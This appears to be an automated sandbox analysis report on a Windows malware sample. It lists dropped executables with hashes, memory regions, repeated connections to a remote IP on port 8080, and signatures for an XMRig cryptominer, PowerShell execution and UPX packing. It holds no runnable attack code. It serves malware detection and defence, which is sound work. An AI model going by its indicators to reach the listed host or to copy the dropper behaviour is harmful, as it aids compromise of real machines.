C:\Windows\System\xxiagET.exe

C:\Windows\System\mBIRJEJ.exe

C:\Windows\System\mBIRJEJ.exe

C:\Windows\System\yjYdVVF.exe

C:\Windows\System\yjYdVVF.exe

C:\Windows\System\JNEUnuX.exe

C:\Windows\System\JNEUnuX.exe

C:\Windows\System\gjATpHj.exe

C:\Windows\System\gjATpHj.exe

C:\Windows\System\zxwxgdH.exe

C:\Windows\System\zxwxgdH.exe

C:\Windows\System\jGpooGm.exe

C:\Windows\System\jGpooGm.exe

C:\Windows\System\STjMlLk.exe

C:\Windows\System\STjMlLk.exe

C:\Windows\System\nMCdKjc.exe

C:\Windows\System\nMCdKjc.exe

C:\Windows\System\bgGEbvU.exe

C:\Windows\System\bgGEbvU.exe

C:\Windows\System\riuMsgc.exe

C:\Windows\System\riuMsgc.exe

C:\Windows\System\UompMLv.exe

C:\Windows\System\UompMLv.exe

C:\Windows\System\KVdPcsp.exe

C:\Windows\System\KVdPcsp.exe

C:\Windows\System\pTBZCMb.exe

C:\Windows\System\pTBZCMb.exe

C:\Windows\System\IEmVvAd.exe

C:\Windows\System\IEmVvAd.exe

C:\Windows\System\BZxFPCC.exe

C:\Windows\System\BZxFPCC.exe

C:\Windows\System\wuoUHPy.exe

C:\Windows\System\wuoUHPy.exe

C:\Windows\System\LQsywln.exe

C:\Windows\System\LQsywln.exe

C:\Windows\System\UFdUhYR.exe

C:\Windows\System\UFdUhYR.exe

C:\Windows\System\WNhucrE.exe

C:\Windows\System\WNhucrE.exe

C:\Windows\System\NZPwVQQ.exe

C:\Windows\System\NZPwVQQ.exe

C:\Windows\System\SyDgAqU.exe

C:\Windows\System\SyDgAqU.exe

C:\Windows\System\QdsEiPV.exe

C:\Windows\System\QdsEiPV.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp

Files

memory/2020-1-0x000000013F6A0000-0x000000013FA96000-memory.dmp

memory/2020-0-0x0000000000080000-0x0000000000090000-memory.dmp

C:\Windows\system\aqVoOva.exe

MD5 4cb90fd4dd74f9884d247b8131d226b1
SHA1 a89195ac2e196e888ab4d7cf3ed2e590bc0cd5d9
SHA256 68e27eb55b35920a5153c5e8f53996e0414ebdd5d468ae24940ec812766c362f
SHA512 b8f3727c71f04bf8c26577a55a6c9e64466b26b370c9f3b3a2d35944f445439a157a795be786315ae42043270098619a0f4bac1ac05b1a75aa598d081389ce02

memory/2020-12-0x0000000002A10000-0x0000000002E06000-memory.dmp

\Windows\system\vVpRmSL.exe

MD5 95ea255ba40c7b197a3339c7923432e4
SHA1 038ad649d7c8dab0c74fd67ee317512ddab3ff93
SHA256 2434602e6d8f16e46b672abdf8db11cfe5f1d34e7aef9805fe2a2b220f252df2
SHA512 d774b2dbd682cc4b1d55b78d7b05687802db75cd827e1e5a788f21ae26a2368749bf045d69d7f1cfad930684117b432560f960e26da79ecee977b4e6c45bea07

memory/2020-20-0x000000013F090000-0x000000013F486000-memory.dmp

C:\Windows\system\ZALNYZZ.exe

MD5 b651ac449192d0d4969aeda01d900800
SHA1 afcab269aca28db7aab20e719cdd0660f326c201
SHA256 9b8390118bc960bbc06813fa0307d5e4fb082e07f834f5d77de4345eaefeefae
SHA512 c77165d038195637dca411ff572d97fdca4305b97fbc9569b47b49fbf925ed24247511909b676e8643553b93814940bc2b2acf9988d48aba5df4d2fc60eb1d5b

C:\Windows\system\HXDKlfg.exe

MD5 c069aa59d5df0bbfd67917f69b7f4e6a
SHA1 649061813f53894671c65e1a044a1be004ef3e08
SHA256 54e1652499c1322ee8fb99e8e1380ca2618a652556c54faabda4f7faff0ef7d2
SHA512 149abd2299c37493910f23b32264fa69126d9715eb6e6a7132d621cebc42441f5b61e294fe94afd72a8a6748226efbadb9c6f76092ef5f8bf3eb99bc2e07d818

C:\Windows\system\cJQsBKN.exe

MD5 e54e5acc0b3360d226107ac401ea6dda
SHA1 a011f11b89989ee770e2a7a1031ec185498c517d
SHA256 65a47a0b8ed1fd970cb3c54cbda6461a7afc4702e795400174372643f73d3dea
SHA512 134dd529345aefe2111feffd67d4326231ab22327ff3e370fab7f0dd1d413d6ce0226d1b49a37b0c4335829c87ec1f6f6118a99f6b8f830a220ede0e5e32272d

C:\Windows\system\yNEfsBQ.exe

MD5 6917a89f20d647d5fda2d64bf6351363
SHA1 0690aeec341969a75e413ad5e78d17fba9e1ff94
SHA256 d7fcf0cafecef0ab5a94877d210d3f8fbb14a15d3fc860e53de4daf8a7a9d4f0
SHA512 14d275f82bad62cb0eee9007eb2b8a100ea9fac191a0353536407028d2632ed3ee126d620043e38a2b30f9c6827f7c7255f1e3bc49c6267fc6799f8d4982f466

C:\Windows\system\pPQJomb.exe

MD5 6447243c55cf876b189cdc5da3faa06c
SHA1 b1db24653a4eff439e521445a5b1459d8ece321d
SHA256 8b7fa634bf49c5d8d4a2030e4646a1bcde92adc7f6e012c9fde189edeab0be67
SHA512 3c4f7356e7d7780596c4ecbf7e1338fecd8ec05caea0291187ef6d76bdc3d40f22de1b43927ad46b6589ad097dd3024c890934f230773baca7133d4abb95bf23

C:\Windows\system\rTjpKjU.exe

MD5 b2a1e2b3631e1789f026ba3f6ce248ac
SHA1 f1e84b5372a98d6eb147957e0788e3bfe2c45b40
SHA256 a57afd50af521c548cf9152c7cb5912e3d6cafe8d2521a0e700483efdc1030c2
SHA512 d2adb2cda35f66e1b8391c9af7e49d3a3c8f07ea2cfe7970f5b766f95219e7fbd902e62c525e97f5cf325d7977f0e61e0a1374e08c95577143e78c535b4b1e2f

C:\Windows\system\weKPtyY.exe

MD5 6625570761d96231996a98253491ec89
SHA1 e5d2fc1212acd2febc3f9004b4a3080fd549725a
SHA256 e5766416aa5dc11e483ad7b7afd87aae1393bd1025b322d4819a725458361732
SHA512 3b99583989c5c08784ad529cba3d703b33fd25a1ca75992a4b1a5fae831d24b33ec08092eab57b0040d62c31dbf574ebd86022791dfd2c418d881c12f82a554a

C:\Windows\system\woPILJW.exe

MD5 a3db9fd89a0b2ecf336dc3e82d07b939
SHA1 9a95b7b6a33e61855cdb789cf205663b69708cf6
SHA256 628ff3206abdf16a34c3a1a3dc8a02e914fcaf2343e628c9318669db9cfa027a
SHA512 b0de448cff987bd4cb39e469f7473d9abea994d99e2e83eef0a3ef1bc7885ceebff17dce827ad84824452333a59deedd289f6e1e1189fc61611c9710183f1f41

C:\Windows\system\haWFgvU.exe

MD5 dbea48ae8a0652bc053cfbe8bfc3c9a1
SHA1 8834d8b6f71e10bc27b34d526e474492e19dd894
SHA256 beb95d1abdfd81eb1c40ef1ef302f1bdf649bfadc3f1885c046f518c33429114
SHA512 e721036079d78a8b45ea744e2ba33a2a3128094280da0260fb2f66af23e609eed7e2b6c7f121d73a2b84e3a6f2622b7f5233da072b86aa4610799661129f237c

C:\Windows\system\FEmgXlk.exe

MD5 83ee1cfb019c42d27b333d7ec08a960d
SHA1 d0ba02d6c45895b7f6e78130c6d614b09704f8e4
SHA256 5d06cd7afb469500451882975097f4fd1ab17cd196ba25ff1e8d25e9fd7767c3
SHA512 7cb7c08c5797e4178ece6182bded33c4e776f21ace605736a88642b62f4ce881d7a06504552d373345c91fe0fd2b11f9cee021cdd9eadbefc02d4dd8d7336373

C:\Windows\system\nWCjBdO.exe

MD5 cc89e798664e771bd1dce67d212c4136
SHA1 25211be759908355ad25d95d79f37e8060b74c47
SHA256 792f11b7773f6707774d7c8eab1eb1a2b0310ccde7e46e5a5ac57400968cd02b
SHA512 30e8bdd530485dd5b51807cd219a29ab522038aa23ed60f28d87f1d4fb188fd44508e0497584853c2142088133c95309a30a0516b183d2d0142151ecd987c826

memory/1604-154-0x0000000001FD0000-0x0000000001FD8000-memory.dmp

C:\Windows\system\ltEwpmd.exe

MD5 a0f1350f5a025d38693f41eb67cccc71
SHA1 f223a864d669068591cab47add724b34f4605c53
SHA256 0e5192bb932cc03943d5290a413fa0cce1c3ca6454ca351fa788985477d21ac5
SHA512 d4bb1ee11cf68b1f36442c2b87e75409d5792779a116c82ae5092e7729b3ff38335b511772f27f4e2852d9c95e90b09dd954c041c55ae6e239f25bb1e39ad548

\Windows\system\mSdipaY.exe

MD5 d5fde236c483e3008dc998b59e319319
SHA1 8fe4126a9b9a3151da9fe892907d3244e8d2d83c
SHA256 7ebc19a7b6a10678342ffd14ffa6cde2cfd03ee217adedb7ccfcfbd945d5b92e
SHA512 1c3fdaa0f0e7162b670c442f638d3be27631a3719b3a9292a5985733df08e1a6eb77ea957179cfc176f8dc979e8f5c22502cbfd825e51b3f4864b5a587f5eaf1

\Windows\system\LjSfRtn.exe

MD5 e54c2c4b2f072c052443ee9f51c048a4
SHA1 2fbf68a14c268720e6b06dcc422cf2db1cc13a72
SHA256 f401db8eb0df4a9d4428ee3c0b5af37e62859680629a1a195404dc752ad6e1d7
SHA512 2ad60b211d1ad08f582d7eedc60aa4f17b08f7eceb6dd0d8cf0ab3ad818a765ff9188f1f756ddb2b9f1ee2b25c0e77148110316255a89318ce46fddf3c038223

memory/1604-192-0x000007FEF5A60000-0x000007FEF63FD000-memory.dmp

memory/2020-197-0x0000000003100000-0x00000000034F6000-memory.dmp

memory/2020-199-0x0000000003100000-0x00000000034F6000-memory.dmp

memory/2644-206-0x000000013FAC0000-0x000000013FEB6000-memory.dmp

memory/2020-209-0x000000013FF30000-0x0000000140326000-memory.dmp

memory/1604-310-0x000007FEF5A60000-0x000007FEF63FD000-memory.dmp

memory/2020-1727-0x000000013F6A0000-0x000000013FA96000-memory.dmp

memory/2020-2063-0x0000000003100000-0x00000000034F6000-memory.dmp

memory/1180-2506-0x000000013FC70000-0x0000000140066000-memory.dmp

memory/2480-2494-0x000000013FC80000-0x0000000140076000-memory.dmp

memory/2512-2478-0x000000013FF30000-0x0000000140326000-memory.dmp

memory/2340-2486-0x000000013F670000-0x000000013FA66000-memory.dmp

memory/2432-2498-0x000000013FBD0000-0x000000013FFC6000-memory.dmp

memory/2856-2451-0x000000013F590000-0x000000013F986000-memory.dmp

memory/2632-2450-0x000000013F6A0000-0x000000013FA96000-memory.dmp

memory/2644-2456-0x000000013FAC0000-0x000000013FEB6000-memory.dmp

memory/2640-2448-0x000000013F730000-0x000000013FB26000-memory.dmp

memory/2612-2446-0x000000013F660000-0x000000013FA56000-memory.dmp

memory/2628-2434-0x000000013F090000-0x000000013F486000-memory.dmp

memory/1396-2378-0x000000013F7E0000-0x000000013FBD6000-memory.dmp

memory/2020-235-0x0000000002C90000-0x0000000003086000-memory.dmp

memory/1180-234-0x000000013FC70000-0x0000000140066000-memory.dmp

memory/2020-228-0x000000013FC70000-0x0000000140066000-memory.dmp

memory/2340-227-0x000000013F670000-0x000000013FA66000-memory.dmp

memory/2020-217-0x0000000003100000-0x00000000034F6000-memory.dmp

memory/2432-216-0x000000013FBD0000-0x000000013FFC6000-memory.dmp

memory/2480-208-0x000000013FC80000-0x0000000140076000-memory.dmp

memory/2020-213-0x000000013FBD0000-0x000000013FFC6000-memory.dmp

memory/2512-212-0x000000013FF30000-0x0000000140326000-memory.dmp

memory/2020-207-0x000000013FC80000-0x0000000140076000-memory.dmp

memory/2020-203-0x000000013FAC0000-0x000000013FEB6000-memory.dmp

memory/2856-202-0x000000013F590000-0x000000013F986000-memory.dmp

memory/2640-198-0x000000013F730000-0x000000013FB26000-memory.dmp

memory/2612-196-0x000000013F660000-0x000000013FA56000-memory.dmp

memory/2632-195-0x000000013F6A0000-0x000000013FA96000-memory.dmp

memory/1604-193-0x000007FEF5A60000-0x000007FEF63FD000-memory.dmp

C:\Windows\system\oEcDPlJ.exe

MD5 1de0c23d3c7632a5c85bb88d5bdc9ffe
SHA1 54c3593308c168b7064a2d821921b893ba76597e
SHA256 8ce30510ff09a24849a537def8f888cd0e67854cdfcc75dfbc095c21efd09238
SHA512 0d85f9157a6dcfc9da516fdfd8d429c8cd2ca4f060e764401510bf1642747ff3c64ce2e7d014b55e0a9dbc4fbd10fa62fbe07420dbfc5b5263465c842df4f4cd

C:\Windows\system\gWZXiWz.exe

MD5 bbbeaf3c41b4c00408f47ab27f4c5910
SHA1 1c581dd4606880f5184477c8df3db85f5324ef33
SHA256 7a4103e407a66df8fa23c0abc16f15e05823fb6e32f8fd22f50849bbf697d343
SHA512 ffc3665784b84b0d215748e121744060020f20bb74200c722687edf41922a746dfc5286890b0fddbedde32af185cdc9d93d50f1e65423d6bab38b8387545f07d

memory/1604-153-0x000000001B3C0000-0x000000001B6A2000-memory.dmp

C:\Windows\system\SkuSjEn.exe

MD5 d8e57596751e38837d2451e759be56c8
SHA1 5e2bc44f22d5261558315aae12208c982cd0aae5
SHA256 6ee61a416e14731412fb97374753001a96242f02778ca5a577f302525d9d351c
SHA512 a4117f80059d71b24b34713df70dcadb3ee505ed402fa30d2fa2281e241234fd9f1e4e47dd51aa07771782007a5e9e092db3e944df0662282b4b775ab670cb6b

C:\Windows\system\RHAbgTb.exe

MD5 f1bf1792ba6270fec486c983fb005302
SHA1 4a276f3168ccdc96b23587a839cbea474a087b94
SHA256 2fb7e00ba1aee98caae8172f2ede858099d8779ac5423e12f354b917fd74b40e
SHA512 7b9b9a2cf92749778d9f68faab302741b2c301de8244a93715917057d56b74356c1c501a10fd35b6fb990c0a2e12553a06816e392ca6ae572a1d2c616c85555c

C:\Windows\system\tpSrAID.exe

MD5 c26a090c3310b817e6668cbf3ea66c3f
SHA1 a6d6a328ac0e65c219f233064fa8df03b05b372c
SHA256 c170f045de3a7c5cfd9d7d0d9d0de612d06fd76c5b56dfb10c9fc8e67d1f97b3
SHA512 98aba7d9dac57941954d3f73ede2593120d96837607020b4912d631c5713b9e2a1a12f9a104080f8999e6de56ab4e4a2902a050081e7deaf397abfbb2dd18e15

C:\Windows\system\ycUdbaO.exe

MD5 72085d6b44d3423ac1f13c83e2e8a7dd
SHA1 3743b9e6ada74377ad5b85f1cfc7395b481cf94a
SHA256 473fcd9c6b20e77633b7cb4c5d912a81c20966160da507b0f0ece2bd5a2937d4
SHA512 e65feffd4cc4abb9d8555fd4e526e107ed322f925e05ba968035fc18a797ae52689bc5a3695255e960cf3e5db42abb51442b1ae11723443791edbcefaa966598

C:\Windows\system\HrEEZgk.exe

MD5 36ca4dfe6e65e642edd8229743bef666
SHA1 97402cb550453d669983e93ba717bc86649bd4f5
SHA256 4146a14da272e102c0c0268bb80169a026c27e27f733aac0b037b7c544086263
SHA512 3d7db8bb42c18532340fd8dcc7f4db8a1c8968d0291c3f64a540bc6ea08fe80eaa3e085eae8f675a7bfe55025887559af883842244500c65f90fbdd94c7376fb

C:\Windows\system\OIveXLg.exe

MD5 33df14ca818e8089bce9935a66fd45c0
SHA1 082001f502a9d09d8cdc58f51bdd4c3388dada56
SHA256 1953ad2e50dc4012787a8197d94bbfd971f8e5af3b12b87ba67173601f5ace2c
SHA512 2c233b46b57769b85f5066a52098f49a659f276d7f9978c60f878bff6cce221c7c54630195936818ac77957796d55938547cdf6374fcf3b19a051bc110cbda6c

C:\Windows\system\xiTQnZC.exe

MD5 9b62fc589d617174c191b643779ad9b0
SHA1 9540d65f8fe64c6df697c43483a5e4814ae17e04
SHA256 45baf8e3b6ffead81a74a8fa4f8df3c2b3b7333303d7ee6fcdd7e8efdac72788
SHA512 2ee0ba4dcd2e6b2f46ac13ccb3f944170a39ca001ea90fde8b5a28ac119c63731795c161f42a225dff638942c59fa8b8e7de030360a5763b112d0e78fdaef940

C:\Windows\system\cDcrWTh.exe

MD5 407826766409e1ff09dae62c6ec6741b
SHA1 6ec2be6af33b8053ac27516695ca424270236b55
SHA256 ec1ee207daededf40140b498e3275c64e8badf6a17df5f7fdea93e6c341525d2
SHA512 e13cc3767688e0114c5bb20307186af8ef48dc8c9859d751be01464402062cd83f4778d02cff5102b0295223befae67ee0dba49248af940624d27fc01562637a

C:\Windows\system\JfyHCGH.exe

MD5 5e394c35c3289130fddc30bff9da91d0
SHA1 c03c4def9a36d7087698c2fa5b6d23857d9a695b
SHA256 7073ad6584c200d84c4d3f0ddf2fdd1f111d8d32ef0546e06a6d5c45d21ae776
SHA512 36d2166be9ca989b49b9e43a9d3ad834d86eee3303cebfff64d6775bcce1dc2b81f8062b70ab09bb41410f2c4901cbe43161fb8e5148ff9e1887ff0ba6e2d243

C:\Windows\system\VrNpAwS.exe

MD5 5a093538e5c92385e7d08d2f45bca225
SHA1 14451604c7b314ea397f5033a417a776c9550062
SHA256 0546969d0425c3a899877fd25699311f0285f3ee9ffd3dc1d4a7c590174bb66f
SHA512 0e030b182a4a1365c888426bd4b7d5a2688ade099f67d1cd028cdbbe6e9fce2e3867122099b40386cedaba5a9e86bbb9e954b9e9eaa8015271c1149fe1d7fd1c

C:\Windows\system\DdLJuzV.exe

MD5 dd87e82f62cfc531742ecfa0def813db
SHA1 88e0acbe820d494ef7fb0d685f8291ebd84d1113
SHA256 8c274fffa88f82913c8e3470b3ef2a3ca5d47143720a685a02760c5b2e90955a
SHA512 1a986a3cfe2c8ac1db984a5b787dbb5eb0ecc7cd4bda2cb2a01fd1ae33db3ee716914b8afefa7b036ff2fa98fa1a2bb15ec996d851fd49bf853f562326cdc055

C:\Windows\system\TqVzJSS.exe

MD5 29c8f6d2e191ba02ba1a8b573a8ce9ab
SHA1 9a41410d48eb57714c15b707500b740061843c3e
SHA256 313f630e36c0d5fbc9726ea6ea9037d6b475cc4640d60e89dd209c6fc2161a84
SHA512 31637f5bcc49674de09bc3fe7c1985abc8343b536c056a02cdfd92d2da76fd525d496966f5d9be5ae933ec8b248720deebb5575ac686eea98b57eed2a74206ec

C:\Windows\system\NYQfXVf.exe

MD5 f854a81a0f11779c822b288033ad3dac
SHA1 1eebbf5547bc28fb356ba9edf707ca7207e04dcd
SHA256 392311e4ae59a4bb70b223da2644eb822b888815a7d98672550a62dd832ea7cf
SHA512 269095b48c89673537f719202e218f6b1a02efaf88962b939a93641bb273ebaeecbfbfc552513d3c56b05a549a1f71df295afa2c1fbfc0ae9c60720c82d072cd

C:\Windows\system\uzMivXY.exe

MD5 81678354c177694350b5a9bab50cb081
SHA1 93040fe1e7a01b2596f5e43b514fa44e14fa1662
SHA256 a7a699f55ed5117d7c9112b2f722018b4fd41b45ee8f925fb16bd52679abb020
SHA512 0e9c1d02e76f07464aad270e2d167cd6f052f47879fde60182701f3623ec99a5451fc393d34f005151f96e597aea4d6dbb05e90d0694cac24b17c7c69f1eed7f

C:\Windows\system\BfugwXW.exe

MD5 8aeffbd9bfa652146b0b12e9617a9987
SHA1 85dc581481be5735bea5fdd75deb370777311658
SHA256 b91a6c9fcaa16d0b5c0cedb7eccbac7af7ba19bf20e5b349efb094ea4f04a56c
SHA512 80843ca1a9b5b6ba82828457c5c1a02c36ad2dc0063955a45d4af7f2ba814c71f85d4f7f6c724b756205d90f40100eb586494d4518da004fbea42125a3a4e06c

memory/2628-22-0x000000013F090000-0x000000013F486000-memory.dmp

memory/1604-19-0x000007FEF5D1E000-0x000007FEF5D1F000-memory.dmp

memory/1604-18-0x0000000001DB0000-0x0000000001E30000-memory.dmp

memory/1396-16-0x000000013F7E0000-0x000000013FBD6000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-13 10:58

Reported

2024-06-13 11:01

Platform

win10v2004-20240226-en

Max time kernel

54s

Max time network

159s

Command Line

"C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\uaucjTS.exe N/A
N/A N/A C:\Windows\System\DCKYaNf.exe N/A
N/A N/A C:\Windows\System\GXVtWeU.exe N/A
N/A N/A C:\Windows\System\MAcvIvH.exe N/A
N/A N/A C:\Windows\System\wzZMMtp.exe N/A
N/A N/A C:\Windows\System\ATScqZF.exe N/A
N/A N/A C:\Windows\System\QqcgYSi.exe N/A
N/A N/A C:\Windows\System\FrhHKZz.exe N/A
N/A N/A C:\Windows\System\FHXhFqh.exe N/A
N/A N/A C:\Windows\System\Uvxwvvr.exe N/A
N/A N/A C:\Windows\System\qjOgzTR.exe N/A
N/A N/A C:\Windows\System\wQplFun.exe N/A
N/A N/A C:\Windows\System\MEGSeyW.exe N/A
N/A N/A C:\Windows\System\lFjMayh.exe N/A
N/A N/A C:\Windows\System\oiGeUqL.exe N/A
N/A N/A C:\Windows\System\wUvpkHw.exe N/A
N/A N/A C:\Windows\System\idfHsFs.exe N/A
N/A N/A C:\Windows\System\UHHVTPZ.exe N/A
N/A N/A C:\Windows\System\FzRcZrv.exe N/A
N/A N/A C:\Windows\System\zaxZyxq.exe N/A
N/A N/A C:\Windows\System\EMtlddO.exe N/A
N/A N/A C:\Windows\System\ycVugRp.exe N/A
N/A N/A C:\Windows\System\xELLbtx.exe N/A
N/A N/A C:\Windows\System\ZmlHwyc.exe N/A
N/A N/A C:\Windows\System\GmiDuat.exe N/A
N/A N/A C:\Windows\System\vSjEGOY.exe N/A
N/A N/A C:\Windows\System\FHpSzWT.exe N/A
N/A N/A C:\Windows\System\TXTwPtW.exe N/A
N/A N/A C:\Windows\System\VLyPsuC.exe N/A
N/A N/A C:\Windows\System\SqPFEVG.exe N/A
N/A N/A C:\Windows\System\jKuVWFK.exe N/A
N/A N/A C:\Windows\System\YciXjSs.exe N/A
N/A N/A C:\Windows\System\dYaLAmm.exe N/A
N/A N/A C:\Windows\System\WuwYJYb.exe N/A
N/A N/A C:\Windows\System\ZRPVvfm.exe N/A
N/A N/A C:\Windows\System\MkmQVKD.exe N/A
N/A N/A C:\Windows\System\GBTfMuJ.exe N/A
N/A N/A C:\Windows\System\HcnyeHE.exe N/A
N/A N/A C:\Windows\System\iHdjnYd.exe N/A
N/A N/A C:\Windows\System\VMKARbr.exe N/A
N/A N/A C:\Windows\System\WDLIwYZ.exe N/A
N/A N/A C:\Windows\System\baneBjD.exe N/A
N/A N/A C:\Windows\System\YNPjhkI.exe N/A
N/A N/A C:\Windows\System\joqKplf.exe N/A
N/A N/A C:\Windows\System\niyglzu.exe N/A
N/A N/A C:\Windows\System\SxssMUr.exe N/A
N/A N/A C:\Windows\System\CXRPyMU.exe N/A
N/A N/A C:\Windows\System\LDjaUyb.exe N/A
N/A N/A C:\Windows\System\VxNYqxf.exe N/A
N/A N/A C:\Windows\System\SYMIBry.exe N/A
N/A N/A C:\Windows\System\ubXsWAS.exe N/A
N/A N/A C:\Windows\System\pZCFwuf.exe N/A
N/A N/A C:\Windows\System\ZPpsXip.exe N/A
N/A N/A C:\Windows\System\aTnjsHX.exe N/A
N/A N/A C:\Windows\System\XhfPCxc.exe N/A
N/A N/A C:\Windows\System\tJdXhHg.exe N/A
N/A N/A C:\Windows\System\eoupkda.exe N/A
N/A N/A C:\Windows\System\pGDyadr.exe N/A
N/A N/A C:\Windows\System\iGsoeNB.exe N/A
N/A N/A C:\Windows\System\Nkkxhdn.exe N/A
N/A N/A C:\Windows\System\wOIoKaq.exe N/A
N/A N/A C:\Windows\System\ADJWChc.exe N/A
N/A N/A C:\Windows\System\CIzxgkO.exe N/A
N/A N/A C:\Windows\System\TdxNdRO.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\TXTwPtW.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\zZYSNlZ.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\sAiNbfb.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\feEBHCV.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\UgToqhp.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\HJEFQUI.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\hRPdtYx.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\qcNridr.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\dYaOTXZ.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ShJUKxF.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\SqPFEVG.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\wOIoKaq.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\jqoROes.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\XFkJGqA.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\kJXsueO.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\qBUQMid.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\VgRbKdd.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
